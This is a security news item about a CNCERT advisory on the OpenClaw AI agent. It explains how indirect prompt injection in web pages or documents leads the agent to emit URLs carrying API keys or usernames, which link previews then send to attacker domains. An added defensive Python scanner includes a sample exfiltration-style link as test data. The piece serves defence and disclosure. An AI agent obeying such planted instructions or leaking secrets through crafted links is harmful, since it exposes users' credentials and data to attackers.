Warning for OpenClaw Users: AI Agent Vulnerability Exposes Systems to Prompt Injection Attacks and Data Theft


Monday, March 16, 2026

China’s CNCERT has issued an urgent security advisory regarding OpenClaw (formerly known as Clawdbot). The warning highlights that the platform’s weak default security configurations, combined with high-level system permissions granted to the AI agent, may create serious risks. These permissions allow the AI to perform tasks on behalf of users, but they also open opportunities for attackers to compromise endpoints if the system is manipulated. Such attacks could lead to the exposure of confidential business data and passwords, posing significant risks to critical sectors such as finance and energy.

The most concerning attack method identified is Indirect Prompt Injection (IDPI). In this technique, attackers embed malicious instructions within web pages or documents that the AI agent may access. When a user asks the AI to summarize or analyze such content, the AI may unknowingly generate URLs containing sensitive user information, such as API keys or usernames, and transmit them to attacker-controlled domains. The risk becomes even more severe when the AI is used within applications that automatically generate link previews, such as Telegram or Discord. In such cases the client fetches the link to render the preview, so the sensitive data is transmitted as soon as the AI produces the response, even if the user never clicks the link.
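As an added illustration (not code from the advisory or from the OpenClaw project) of the outbound check a chat integration could run before an agent reply reaches a link-previewing client: it flags links that point outside a domain allowlist or that carry a known secret, including percent-encoded and base64 forms. The allowlisted domain, the secret value and the sample response are constructed for this example.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

URL_RE = re.compile(r"https?://[^\s<>()\"']+")
REASON_HOST = "host not in allowlist"
REASON_SECRET = "url carries a known secret"

# Constructed sample values for the example (not real credentials or hosts).
SECRETS = {"sk-live-EXAMPLE1234"}
ALLOWED_DOMAINS = {"docs.example.org"}
SAMPLE_RESPONSE = (
    "Here is the summary of the page you asked about.\n"
    "Reference: https://docs.example.org/guide\n"
    "![status](https://collector.invalid/p?u=alice&k=sk-live-EXAMPLE1234)\n"
)


def _forms(secret):
    """Literal and base64 spellings of a secret; percent-encoding is handled by unquote()."""
    b64 = base64.b64encode(secret.encode()).decode().rstrip("=")
    return {secret, b64}


def _host_allowed(host, allowed):
    return host in allowed or any(host.endswith("." + d) for d in allowed)


def scan_agent_output(text, secrets, allowed_domains):
    """Return (url, reason) pairs for every link that should not leave the system."""
    findings = []
    for url in URL_RE.findall(text):
        url = url.rstrip(".,;")
        host = (urlsplit(url).hostname or "").lower()
        decoded = unquote(url)
        if not _host_allowed(host, allowed_domains):
            findings.append((url, REASON_HOST))
        if any(form in decoded for secret in secrets for form in _forms(secret)):
            findings.append((url, REASON_SECRET))
    return findings


def redact(text, findings):
    """Strip every flagged link so a previewing client has nothing to fetch."""
    for url, _ in findings:
        text = text.replace(url, "[link removed]")
    return text


if __name__ == "__main__":
    hits = scan_agent_output(SAMPLE_RESPONSE, SECRETS, ALLOWED_DOMAINS)
    print(hits)
    print(redact(SAMPLE_RESPONSE, hits))
```

A blocked link is worth logging as a detection event in its own right, since a reply that tries to reach a non-allowlisted host with a secret in the query string is the signature of the injection described above.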

Additionally, researchers have discovered malicious installers disguised as OpenClaw packages on GitHub, along with deceptive prompts encouraging users to install dangerous add-on modules. Due to these risks, the use of OpenClaw has reportedly been banned in Chinese government agencies and state-owned enterprises. Security experts recommend that users restrict management ports from public internet access, deploy the service within isolated containerized environments, and only download add-ons from trusted sources. It is also advised to disable automatic updates for extensions to prevent attackers from introducing malicious code through compromised updates.

Source: https://thehackernews.com/2026/03/openclaw-ai-agent-flaws-could-enable.html